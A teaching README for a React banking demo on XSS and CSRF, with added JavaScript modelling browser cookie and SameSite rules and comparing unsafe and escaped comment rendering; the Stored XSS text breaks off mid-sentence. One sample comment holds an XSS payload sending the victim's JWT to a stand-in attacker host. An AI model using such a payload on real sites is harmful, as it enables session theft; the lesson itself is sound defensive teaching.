
# XSS and CSRF Demo

This lesson is an introduction to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), using a simple banking application as an example.

## Preparation

Clone the repository and install dependencies:

```sh
npm install
```

Start the development server:

```sh
npm run dev
```

Open your browser and navigate to https://localhost:5173. (Vite serves plain HTTP unless `server.https` is configured in `vite.config.js`; use whichever URL the dev server prints.) Familiarize yourself with the application structure, focusing on the `src` directory and its components.

Get the server code from https://github.com/thinkdaniel/6m-software-m4-node-app-for-devops, install the dependencies with `npm install` and start it with `node index.js`. You can change the username and password in `authController.js` if you prefer.

## JWT Authentication

On login, the backend returns a JWT and also sets a cookie containing the token for future authentication. The JWT is used to verify the user's identity and authorize access to protected resources.

In this demo, the JWT is stored in `localStorage` as well as in a cookie. That gives an attacker two different targets: anything in `localStorage` can be read by any script running on the page (the XSS case), and the cookie is attached automatically by the browser to requests for the host that set it, whether or not the page making the request is yours (the CSRF case).

Note on cookie scope: a cookie is not bound to an origin. The browser matches cookies on host (or the `Domain` attribute) and `Path`; scheme and port are not part of the match, except that a cookie marked `Secure` is only sent over HTTPS. So a cookie set by the API server is also sent along with requests from the Vite dev server on a different port. Whether the cookie is also attached to requests initiated from another site (for example, a form on an attacker's page that posts to the bank) is controlled by the `SameSite` attribute: `Strict` never, `Lax` only on top-level GET navigations, `None` always (and `None` requires `Secure`). A cookie without `SameSite` is treated as `Lax` by Chromium-based browsers but not by every browser, so what the CSRF demo shows depends on how the server sets the cookie and on the browser you use.

## XSS

XSS means Cross-Site Scripting, a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.

### Stored XSS Demo

A Stored XSS vulnerability occurs when user input is stored on the server (e.g., in a database) and then displayed to other users without proper…
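The cookie-scope rules in the JWT Authentication section, as an added example (not code from the react-xss-csrf repo or the Node server it uses). It models what a browser checks before attaching a cookie to a request: host/`Domain`, `Path`, `Secure` and `SameSite`. The API port 3000, the attacker host `evil.example` and the cookie settings are assumptions for the scenario; "site" is simplified to the last two host labels instead of a public-suffix lookup, a missing `SameSite` is treated as `Lax` as Chromium does, and expiry, cookie prefixes and partitioned cookies are ignored.

```javascript
// Added example for the JWT/cookie section of this lesson; not project code.
// Models the browser's decision to attach a cookie to a request. Simplified:
// "site" = last two host labels (no public-suffix list), missing SameSite
// treated as Lax (Chromium behaviour), no expiry/prefix/partition handling.

// Registrable site of a host, e.g. "app.bank.example" -> "bank.example".
function siteOf(hostname) {
  return hostname.split(".").slice(-2).join(".");
}

// RFC 6265 path-match: equal, or the cookie path is a prefix ending at a "/" boundary.
function pathMatches(cookiePath, requestPath) {
  if (requestPath === cookiePath) return true;
  const prefix = cookiePath.endsWith("/") ? cookiePath : cookiePath + "/";
  return requestPath.startsWith(prefix);
}

// cookie:  { domain, hostOnly, path, secure, httpOnly, sameSite }
//   domain    host that set the cookie (hostOnly: true) or the Domain attribute
//   sameSite  "Strict" | "Lax" | "None" | undefined
// request: { url, initiator, topLevelNavigation, method }
//   initiator the URL of the page that caused the request
function cookieIsSent(cookie, request) {
  const target = new URL(request.url);
  const initiator = new URL(request.initiator);

  // 1. Host match. Scheme and port play no part: a cookie set by
  //    localhost:3000 matches a request to localhost:5173 as well.
  const hostOk = cookie.hostOnly
    ? target.hostname === cookie.domain
    : target.hostname === cookie.domain ||
      target.hostname.endsWith("." + cookie.domain);
  if (!hostOk) return false;

  // 2. Path match.
  if (!pathMatches(cookie.path || "/", target.pathname)) return false;

  // 3. Secure cookies only travel over https.
  if (cookie.secure && target.protocol !== "https:") return false;

  // 4. SameSite only restricts cross-site requests.
  if (siteOf(initiator.hostname) === siteOf(target.hostname)) return true;
  switch (cookie.sameSite || "Lax") {
    case "None":   return true;   // attached to cross-site form posts: CSRF-prone
    case "Strict": return false;
    case "Lax":    return request.topLevelNavigation === true &&
                          (request.method || "GET").toUpperCase() === "GET";
    default:       return false;
  }
}

// Constructed scenario (assumptions): the Node API at localhost:3000 sets the
// session cookie, the React app runs at localhost:5173, and an attacker page
// at evil.example hosts an auto-submitting form aimed at the transfer endpoint.
const SESSION_COOKIE = {
  domain: "localhost", hostOnly: true, path: "/",
  secure: false, httpOnly: true, sameSite: "None",
};
const FROM_APP = {
  url: "http://localhost:3000/api/transfer",
  initiator: "http://localhost:5173/",
  topLevelNavigation: false, method: "POST",
};
const CSRF_FORM = {
  url: "http://localhost:3000/api/transfer",
  initiator: "https://evil.example/",
  topLevelNavigation: true, method: "POST",
};

// Runs the scenario with each SameSite setting and returns the outcomes.
function demo() {
  const lax = { ...SESSION_COOKIE, sameSite: "Lax" };
  return {
    fromApp:    cookieIsSent(SESSION_COOKIE, FROM_APP),   // different port, still sent
    csrfNone:   cookieIsSent(SESSION_COOKIE, CSRF_FORM),  // cross-site POST, sent
    csrfLax:    cookieIsSent(lax, CSRF_FORM),             // cross-site POST, blocked
    csrfLaxGet: cookieIsSent(lax, { ...CSRF_FORM, method: "GET" }), // GET nav, sent
    csrfStrict: cookieIsSent({ ...SESSION_COOKIE, sameSite: "Strict" }, CSRF_FORM),
  };
}

console.log(demo());
```

The `fromApp` case is the one the lesson's "same origin" wording gets wrong: the dev server on port 5173 and the API on port 3000 are different origins but the same site, so the cookie is sent. The `csrfLaxGet` case is the reminder that `SameSite=Lax` does not protect a state-changing endpoint that accepts GET.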
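The stored-XSS path described above, as an added example (not code from the react-xss-csrf repo): a comment saved by one user is later rendered into HTML for another. The comment text, the attacker host `attacker.example`, the `token` key and the element names are constructed for this example. The payload targets the `localStorage` copy of the JWT because page script can read it; an `HttpOnly` cookie could not be read this way.

```javascript
// Added example for the Stored XSS section; not project code. Models the
// server-side render of a stored comment, once unescaped and once escaped.
// Comment text, attacker host and storage key are constructed for this example.

// What a malicious user submits. If it reaches the victim's DOM unescaped, the
// onerror handler runs as the victim and exfiltrates the JWT this demo keeps
// in localStorage under an assumed key "token".
const MALICIOUS_COMMENT =
  '<img src=x onerror="fetch(\'https://attacker.example/?t=\' + localStorage.getItem(\'token\'))">';

// Ordinary text that happens to contain markup characters; it must survive intact.
const BENIGN_COMMENT = "Thanks, transfer received. 5 < 10 & 10 > 5";

// Escape the five characters that can change HTML structure or end an attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: stored text is concatenated straight into markup. In a React
// component the equivalent sink is dangerouslySetInnerHTML={{ __html: comment }}.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Fixed: the text is escaped, so it can only ever be text. React applies the
// same escaping by default when you render {comment} as a child.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Crude check used to compare the two renderers: any tag other than the <li>
// wrapper in the output came from user input.
function containsInjectedTag(html) {
  return /<(?!\/?li\b)[a-z]/i.test(html);
}

console.log("unsafe:", renderCommentUnsafe(MALICIOUS_COMMENT));
console.log("safe:  ", renderCommentSafe(MALICIOUS_COMMENT));
```

Escaping at the point of output is the fix; filtering on input is not, because the same stored string may later be rendered into a context (attribute, URL, script) where a different escape is needed. Keeping the JWT out of `localStorage` limits what a successful payload can steal but does not remove the XSS.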
react-xss-csrf

